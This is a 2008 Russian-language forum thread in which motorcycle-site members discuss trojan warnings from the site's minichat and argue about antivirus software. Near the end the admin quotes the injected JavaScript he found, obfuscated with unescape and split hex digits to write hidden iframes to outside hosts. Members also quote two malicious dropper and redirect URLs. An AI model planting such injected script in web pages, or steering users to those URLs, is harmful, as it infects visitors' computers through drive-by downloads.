Автор
Тошка Главный мегаоптимист МТ Возраст: 38 Сообщения: 8090 Откуда: Московская
Добавлено: 12 Декабрь 2008 18:17 Заголовок сообщения:
а у меня нет антивирусов на компе... можно считать, что я с НОДом... _________________
Lady Кудряшка :) Возраст: 28 Сообщения: 2336 Откуда: СПб
Добавлено: 12 Декабрь 2008 18:37 Заголовок сообщения:
VETALEG
Спасибо))))
Я бы не догадалась,весьма тебе признательна)))
Kirex Шашлык-мейстер Возраст: 43 Сообщения: 3461 На чем ездит: Getz+Honda Shadow 1100
Добавлено: 12 Декабрь 2008 18:46 Заголовок сообщения:
Ole-Lukoe писал(а):
Kirex писал(а):
nod32 FOREVER
Угу
Проверь у себя онлайн антивирусами;
да нахрена мне это надо...
у меня нод несколько раз в день базы обновляет. пока косяков небыло. _________________ Стоишь на берегу и чувствуешь соленый запах ветра, что веет с моря. И веришь, что свободен ты и жизнь лишь началась. И губы жжет подруги поцелуй, пропитанный слезой....
mongolor человек-МОТОПЬЯНЬ! Возраст: 35 Сообщения: 7555 Откуда: СПБ, Электросила На чем ездит: Велосипед
Добавлено: 12 Декабрь 2008 19:15 Заголовок сообщения:
Народ я полностью отрицаю возможность расположения на страницах мотопьяни каких либо вредоносных кодов или ссылок на на такие вещи
Ole-Lukoe писал(а):
Вот похоже один из этих адресов и был заражен и кидал еще дальше на фишинговые ресурсы! а проявлялось это именно как зависон чата а потом срабатывал касперыч, ссылки я дал в первом посте.
Если бы хоть один был заражен, то на ВСЕХ бы страницах было тоже самое, ибо подгружается все что есть на ВСЕ страницы!(кроме блога), так что ругайте своего касперыча и компьютеры которые давно пора ремонтировать Привет Тошка _________________ Необходимое, но недостаточное условие запуска ЛЮБОГО ДВИЖИНА - НЕПОКОЛЕБИМАЯ ВЕРА ЧТО ОН ЗАПУСТИТСЯ, ДАЖЕ ЕСЛИ ПОРШЕНЬ УКРАЛИ!!!!!!!!
Добавлено: 12 Декабрь 2008 20:07 Заголовок сообщения:
Превед Макс, я ничо и не отрицаю, сама знаю, за какой помойкой сижу)))) _________________
Evgenikk тиранчеГ Мотопьянь Теам Возраст: 41 Сообщения: 8282 Откуда: Питер На чем ездит: AR147
Добавлено: 12 Декабрь 2008 21:13 Заголовок сообщения:
Kirex писал(а):
nod32 FOREVER
Ты знаешь, моё мнение, что если руки кривые, или если человек не шарит в компьютере, не поможет никакой антивирус.
Вот какими способами вирус может попать на комп?
Я знаю только 2:
1. Юзер сам его загрузит на комп (с почты, с флешки, откуда угодно)
2. Через дыру в ОС/Браузере.
Больше не знаю. _________________ мопед охуенный. сам езжу.
Kirex Шашлык-мейстер Возраст: 43 Сообщения: 3461 На чем ездит: Getz+Honda Shadow 1100
Добавлено: 12 Декабрь 2008 21:55 Заголовок сообщения:
через связку нод+агнитум хер чё пролезет _________________ Стоишь на берегу и чувствуешь соленый запах ветра, что веет с моря. И веришь, что свободен ты и жизнь лишь началась. И губы жжет подруги поцелуй, пропитанный слезой....
Nicholaes Мотоупырь МТ Возраст: 51 Сообщения: 3070 Откуда: Ленинград На чем ездит: Honda SH50
Добавлено: 12 Декабрь 2008 21:56 Заголовок сообщения:
Много я видел "онлайн антивирусов", которые кричат, что у тебя что-то есть, а сами тихой сапой троянчик подсовывают...
Кстати, Евгеник прав - Оле, ты каким браузером пользуешься? Мелкомягким интернет эксплоите ром? _________________За Родину, за Сталина!
Если у Вас паранойя, это еще не значит, что за Вами не следят.
Разве Pentium-M - это мобильность? Настоящая мобильность - это Тополь-М!
Я за свободную продажу оружия.
VETALEG Да, я Олень Возраст: 37 Сообщения: 20135 Откуда: оттуда На чем ездит: BM Smile 1997
Добавлено: 16 Декабрь 2008 10:36 Заголовок сообщения:
открываю миничат, получаю сообщение о троянской программе... _________________ .. некий асоциальный человек, у которого постоянно какие-то тёрки с другими людьми...©
Мотоциклисты - это в первую очередь отважные рыцари дорог. и только во вторую - пьяное быдло...©
ПНХ, ХПЖ
Union road club
mongolor человек-МОТОПЬЯНЬ! Возраст: 35 Сообщения: 7555 Откуда: СПБ, Электросила На чем ездит: Велосипед
Добавлено: 16 Декабрь 2008 10:56 Заголовок сообщения:
логи антивиря скинь _________________ Необходимое, но недостаточное условие запуска ЛЮБОГО ДВИЖИНА - НЕПОКОЛЕБИМАЯ ВЕРА ЧТО ОН ЗАПУСТИТСЯ, ДАЖЕ ЕСЛИ ПОРШЕНЬ УКРАЛИ!!!!!!!!
VETALEG Да, я Олень Возраст: 37 Сообщения: 20135 Откуда: оттуда На чем ездит: BM Smile 1997
Добавлено: 16 Декабрь 2008 11:00 Заголовок сообщения:
обнаружено: троянская программа Trojan.Win32.Agent.askc URL: http://suttds.com/spun/load.php?id=0&spl=1 _________________ .. некий асоциальный человек, у которого постоянно какие-то тёрки с другими людьми...©
Мотоциклисты - это в первую очередь отважные рыцари дорог. и только во вторую - пьяное быдло...©
ПНХ, ХПЖ
Union road club
Добавлено: 16 Декабрь 2008 13:13 Заголовок сообщения:
> Здравствуйте!
> > На сайте motopian.ru нашими пользователями был обнаружен вирус(Троян)
> > При проверке мной ничего не обнаружилось.
> > Просьба проверить наличие оных скриптов на сайте, либо подсказать методы
> > проверки.
> >
> >
Вирусов так же обнаружено небыло.
ps енто я писал в пидерхост
так что проблема не в МТ _________________ Необходимое, но недостаточное условие запуска ЛЮБОГО ДВИЖИНА - НЕПОКОЛЕБИМАЯ ВЕРА ЧТО ОН ЗАПУСТИТСЯ, ДАЖЕ ЕСЛИ ПОРШЕНЬ УКРАЛИ!!!!!!!!
Добавлено: 16 Декабрь 2008 13:27 Заголовок сообщения:
ну хрен с ним тогда... _________________ .. некий асоциальный человек, у которого постоянно какие-то тёрки с другими людьми...©
ПНХ, ХПЖ
Union road club
Evgenikk тиранчеГ Мотопьянь Теам Возраст: 41 Сообщения: 8282 Откуда: Питер На чем ездит: AR147
Добавлено: 21 Декабрь 2008 23:02 Заголовок сообщения:
Зашёл я в миничат)) А меня редиректит на этот адрес
http://x4team.cn/s/pdf.php?id=5946&vis=1
но я остановил бровзер и не смотрел чё там))) _________________ мопед охуенный. сам езжу.
Добавлено: 21 Декабрь 2008 23:08 Заголовок сообщения:
пи пи ну неужели, нашел я пи эту засраную пи !
Добавлено спустя 1 минуту 26 секунд:
эта хуйня выглядит так
Код:
<script>var C="3";var D="7";var T="6";document.write(unescape('%'+C+'C%'+T+'9%'+T+'6%'+D+'2%'+T+'1%'+T+'D%'+T+'5%20%7'+C+'%'+D+'2%6'+C+'%'+C+'D%22%'+T+'8%'+D+'4%'+D+'4%'+D+'0%'+C+'A%2F%2F%'+T+'6%'+D+'4%'+D+'0%'+T+'9%'+T+'6%'+D+'2%'+T+'1%'+T+'D%'+T+'5%'+D+'2%2E%'+T+'F%'+D+'2%6'+D+'%2F%7'+C+'%'+D+'5%'+D+'4%'+D+'2%61%2F%'+T+'9%6E%2E%6'+C+'%6'+D+'%69%'+C+'F%'+C+'1%'+C+'9%22%20%66%'+D+'2%61%6D%65%62%6F%'+D+'2%64%65%'+D+'2%'+C+'D%'+C+'0%20%'+D+'7%69%64%'+D+'4%68%'+C+'D%'+C+'0%20%68%65%69%6'+D+'%68%'+D+'4%'+C+'D%'+C+'0%'+C+'E%'+C+'C%2F%69%66%'+D+'2%61%6D%65%'+C+'E'));</script><script>var C="3";var D="7";var T="6";document.write(unescape('%'+C+'C%'+T+'9%'+T+'6%'+D+'2%61%6D%'+T+'5%20%7'+C+'%'+D+'2%6'+C+'%'+C+'D%22%68%'+D+'4%'+D+'4%'+D+'0%'+C+'A%2F%2F%'+T+'6%'+C+'9%69%2E%'+T+'F%'+D+'2%6'+D+'%2F%'+D+'4%64%7'+C+'%2E%'+D+'0%68%'+D+'0%22%20%'+T+'6%'+D+'2%'+T+'1%'+T+'D%'+T+'5%'+T+'2%'+T+'F%'+D+'2%'+T+'4%'+T+'5%'+D+'2%'+C+'D%'+C+'0%20%'+D+'7%'+T+'9%'+T+'4%'+D+'4%'+T+'8%'+C+'D%'+C+'0%20%'+T+'8%'+T+'5%'+T+'9%6'+D+'%68%'+D+'4%'+C+'D%'+C+'0%'+C+'E%'+C+'C%2F%'+T+'9%'+T+'6%'+D+'2%'+T+'1%6D%'+T+'5%'+C+'E'));</script>
_________________ Необходимое, но недостаточное условие запуска ЛЮБОГО ДВИЖИНА - НЕПОКОЛЕБИМАЯ ВЕРА ЧТО ОН ЗАПУСТИТСЯ, ДАЖЕ ЕСЛИ ПОРШЕНЬ УКРАЛИ!!!!!!!!
Добавлено: 21 Декабрь 2008 23:11 Заголовок сообщения:
Чего чего? _________________ мопед охуенный. сам езжу.
Lady Кудряшка :) Возраст: 28 Сообщения: 2336 Откуда: СПб
Добавлено: 21 Декабрь 2008 23:12 Заголовок сообщения:
Evgenikk
что-то с Максом странное твориццо
Добавлено: 21 Декабрь 2008 23:18 Заголовок сообщения:
Херня какая то, пошел по линку-предлагает сохранить какой то pdf
китаезы чего то мутят _________________ Стоишь на берегу и чувствуешь соленый запах ветра, что веет с моря. И веришь, что свободен ты и жизнь лишь началась. И губы жжет подруги поцелуй, пропитанный слезой....
Добавлено: 21 Декабрь 2008 23:27 Заголовок сообщения:
а Нод мне ничо не выдавал... ни разу... _________________
Green местами зеленый (МТ) Возраст: 34 Сообщения: 1716
Добавлено: 21 Декабрь 2008 23:29 Заголовок сообщения:
Антивирусами нафиг никогда не пользуюсь... три установки касперского привели к переустановке системы... т.е. три раза за все время использования компа (с 1994 года) я ставил касперского, и все три раза, в последующем, касперский становился причиной сноса винды...
Добавлено: 21 Декабрь 2008 23:30 Заголовок сообщения:
Тошка писал(а):
а Нод мне ничо не выдавал... ни разу...
потомучто в опере эта фича неработает
Добавлено спустя 1 минуту 1 секунду:
Green писал(а):
Антивирусами нафиг никогда не пользуюсь... три установки касперского привели к переустановке системы... т.е. три раза за все время использования компа (с 1994 года) я ставил касперского, и все три раза, в последующем, касперский становился причиной сноса винды...
правильно, позно пить боржоми когда почки отказали!
нада антивирус ставить на чистую девственную систему! тогда он просто недаст проникнуть на комп! _________________ Необходимое, но недостаточное условие запуска ЛЮБОГО ДВИЖИНА - НЕПОКОЛЕБИМАЯ ВЕРА ЧТО ОН ЗАПУСТИТСЯ, ДАЖЕ ЕСЛИ ПОРШЕНЬ УКРАЛИ!!!!!!!!
Добавлено: 21 Декабрь 2008 23:31 Заголовок сообщения:
mongolor это хорошо? _________________
Добавлено: 21 Декабрь 2008 23:33 Заголовок сообщения:
Тошка
да _________________ Необходимое, но недостаточное условие запуска ЛЮБОГО ДВИЖИНА - НЕПОКОЛЕБИМАЯ ВЕРА ЧТО ОН ЗАПУСТИТСЯ, ДАЖЕ ЕСЛИ ПОРШЕНЬ УКРАЛИ!!!!!!!!
Green местами зеленый (МТ) Возраст: 34 Сообщения: 1716
Добавлено: 21 Декабрь 2008 23:36 Заголовок сообщения:
Макс, ну не надо из меня ламера полного делать... Естественно касп ставился вместе с системой... просто причиной ПОСЛЕДУЮЩЕГО сноса, через энное количество времени становился именно он...